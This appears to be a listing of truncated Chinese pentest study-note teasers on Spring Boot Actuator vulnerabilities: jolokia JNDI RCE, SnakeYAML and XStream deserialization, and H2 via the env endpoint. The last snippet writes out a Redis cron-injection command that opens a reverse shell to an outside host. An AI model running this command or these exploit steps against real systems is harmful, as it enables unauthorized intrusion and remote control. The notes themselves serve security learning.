前言：jolokia Realm JNDI RCE 學習筆記 參考文章：https://static.anquanke.com/download/b/security-geek-2019-q1/article-10.html 有個疑問點還是不太懂，因為Tomcat是SpringBoot內嵌 ...

一、漏洞成因： 　　spring cloud在低版本下的 SnakeYAML 依賴組件存在反序列漏洞（所以有的利用叫：springcloud-snakeyaml-rce） 二、利用條件　　 　　Spring boot版本范圍： 　　　　Spring Boot 2.X 　　 全部 ...

前言：jolokia logback JNDI RCE 漏洞學習筆記 在實戰中碰到的幾率還是有的，不過有時候不存在相關可利用的依賴，有時候不存在相關可利用的MBean，總是會覺得可惜... 這里不講述相關的jolokia的MBean使用方法，如果需要的話可以去學習下 參考文章：https ...

一、漏洞成因 　　spring-cloud-starter-netflix-eureka-client組件使用 Xstream 序列化功能，在一定條件下觸發REC。 　　（XStream：XStream是Java類庫，用來將對象序列化成XML （JSON）或反序列化為對象。） 二、利用條件 ...

一、漏洞成因 　　env接口暴露 　　使用h2 database 依賴 二、利用條件 　　env接口 　　restart接口 　　存在 com.h2database.h2 依賴 三、漏洞確認 　　訪問env接口，查看是否存在h2 database相關依賴 　　 四、漏洞 ...

日穿掃描掃到一個spring boot actuator 可以看到有jolokia這個端點，再看下jolokia/list，存在type=MBeanFactory 關鍵字 可以使用jolokia-realm-jndi-rce具體步驟如下 先用python3開一個web服務 編譯 ...

請遵守網絡安全法！！！本文僅供學習交流使用！用於任何非授權滲透、非法目的攻擊、從事非法活動均與筆者無關！讀者自行承擔其惡果！ EXP 來源 ...

　　未授權無需認證訪問內部數據庫。 利用計划任務反彈shell redis-cli -h 192.168.2.6 set x "\n* * * * * bash -i >& /dev/tcp/192.168.1.1/4444 0>&1\n" config ...